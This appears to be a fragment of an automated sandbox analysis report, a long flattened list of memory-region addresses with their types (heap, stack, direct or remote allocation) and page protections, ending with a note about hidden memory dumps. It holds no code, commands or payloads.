page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
227B000
|
heap
|
page read and write
|
||
7340000
|
trusted library allocation
|
page read and write
|
||
72C0000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
2D00000
|
trusted library allocation
|
page read and write
|
||
459000
|
unkown
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
220C000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
75DB000
|
stack
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
227B000
|
heap
|
page read and write
|
||
2970000
|
direct allocation
|
page read and write
|
||
220E000
|
stack
|
page read and write
|
||
2321A000
|
heap
|
page read and write
|
||
235BB000
|
heap
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
89C0000
|
direct allocation
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
6F8C000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
2208000
|
heap
|
page read and write
|
||
221D000
|
heap
|
page read and write
|
||
7320000
|
trusted library allocation
|
page read and write
|
||
42F000
|
unkown
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2D78000
|
trusted library allocation
|
page read and write
|
||
7307000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page read and write
|
||
6A5F000
|
stack
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
29CF000
|
stack
|
page read and write
|
||
7258000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
1D4000
|
heap
|
page read and write
|
||
23B7C000
|
unclassified section
|
page execute and read and write
|
||
21EE000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2D90000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
8380000
|
heap
|
page read and write
|
||
2480000
|
heap
|
page read and write
|
||
30BD000
|
stack
|
page read and write
|
||
21EF000
|
heap
|
page read and write
|
||
220B000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
8970000
|
direct allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
82CC000
|
stack
|
page read and write
|
||
21C0000
|
heap
|
page read and write
|
||
83B9000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
A1A000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
9EF000
|
stack
|
page read and write
|
||
2D22000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6E50000
|
direct allocation
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page execute and read and write
|
||
6F1B000
|
heap
|
page read and write
|
||
83CD000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
8391000
|
heap
|
page read and write
|
||
2357C000
|
heap
|
page read and write
|
||
287D000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page readonly
|
||
720000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
744E000
|
stack
|
page read and write
|
||
23410000
|
heap
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
2320B000
|
heap
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
2201000
|
heap
|
page read and write
|
||
9E000
|
stack
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
31DF000
|
stack
|
page read and write
|
||
8990000
|
direct allocation
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
21F4000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
6EA0000
|
heap
|
page read and write
|
||
22E50000
|
remote allocation
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
730000
|
direct allocation
|
page read and write
|
||
177000
|
stack
|
page read and write
|
||
760000
|
direct allocation
|
page read and write
|
||
28CF000
|
stack
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
750000
|
direct allocation
|
page read and write
|
||
5DEE000
|
remote allocation
|
page execute and read and write
|
||
21C0000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
235CB000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
6E60000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
7FB0000
|
trusted library allocation
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
49EE000
|
remote allocation
|
page execute and read and write
|
||
26D1000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
28D3000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
31BE000
|
stack
|
page read and write
|
||
7530000
|
trusted library allocation
|
page read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
8AD6000
|
heap
|
page read and write
|
||
229FF000
|
stack
|
page read and write
|
||
A16000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
21EE000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
731000
|
heap
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
740E000
|
stack
|
page read and write
|
||
8364000
|
heap
|
page read and write
|
||
22A5000
|
heap
|
page read and write
|
||
267E000
|
stack
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
7200000
|
heap
|
page read and write
|
||
6E30000
|
direct allocation
|
page read and write
|
||
BFDE000
|
direct allocation
|
page execute and read and write
|
||
1D4000
|
heap
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
23AA0000
|
unclassified section
|
page execute and read and write
|
||
504000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2201000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
23BD6000
|
direct allocation
|
page execute and read and write
|
||
3306000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
A1DE000
|
direct allocation
|
page execute and read and write
|
||
23BAB000
|
unclassified section
|
page execute and read and write
|
||
6EA8000
|
heap
|
page read and write
|
||
2214000
|
heap
|
page read and write
|
||
2214000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
3FEE000
|
remote allocation
|
page execute and read and write
|
||
17C000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
5B06000
|
trusted library allocation
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
80E0000
|
trusted library allocation
|
page read and write
|
||
6F75000
|
heap
|
page read and write
|
||
DDDE000
|
direct allocation
|
page execute and read and write
|
||
65C000
|
stack
|
page read and write
|
||
5AF3000
|
trusted library allocation
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
7540000
|
trusted library allocation
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
81C0000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
236A0000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21E9000
|
heap
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
52DE000
|
trusted library allocation
|
page read and write
|
||
21FA000
|
heap
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
227B000
|
heap
|
page read and write
|
||
7F80000
|
trusted library allocation
|
page execute and read and write
|
||
A1A000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
21F7000
|
heap
|
page read and write
|
||
6F2A000
|
heap
|
page read and write
|
||
8A20000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
235BE000
|
heap
|
page read and write
|
||
72D0000
|
heap
|
page read and write
|
||
2DD6000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
83F7000
|
heap
|
page read and write
|
||
21F0000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
2321A000
|
heap
|
page read and write
|
||
50AA000
|
trusted library allocation
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
220E000
|
heap
|
page read and write
|
||
32BF000
|
stack
|
page read and write
|
||
4AB6000
|
trusted library allocation
|
page read and write
|
||
59C7000
|
trusted library allocation
|
page read and write
|
||
21CE000
|
stack
|
page read and write
|
||
23181000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
1730000
|
remote allocation
|
page execute and read and write
|
||
8960000
|
direct allocation
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
263E000
|
stack
|
page read and write
|
||
7570000
|
trusted library allocation
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
235BE000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
45C000
|
unkown
|
page readonly
|
||
2201000
|
heap
|
page read and write
|
||
493E000
|
stack
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
6E70000
|
heap
|
page read and write
|
||
28E1000
|
heap
|
page read and write
|
||
3720000
|
heap
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
317E000
|
unkown
|
page read and write
|
||
235CB000
|
heap
|
page read and write
|
||
2990000
|
direct allocation
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
2320A000
|
heap
|
page read and write
|
||
2960000
|
direct allocation
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
223F000
|
heap
|
page read and write
|
||
235CC000
|
heap
|
page read and write
|
||
223F000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
2CF4000
|
trusted library allocation
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
74B000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
92F000
|
stack
|
page read and write
|
||
72C000
|
heap
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
6F79000
|
heap
|
page read and write
|
||
21D8000
|
heap
|
page read and write
|
||
1D4000
|
heap
|
page read and write
|
||
742000
|
heap
|
page read and write
|
||
23B0000
|
heap
|
page read and write
|
||
6F94000
|
heap
|
page read and write
|
||
6E70000
|
direct allocation
|
page read and write
|
||
6FA0000
|
heap
|
page read and write
|
There are 777 hidden memdumps, click here to show them.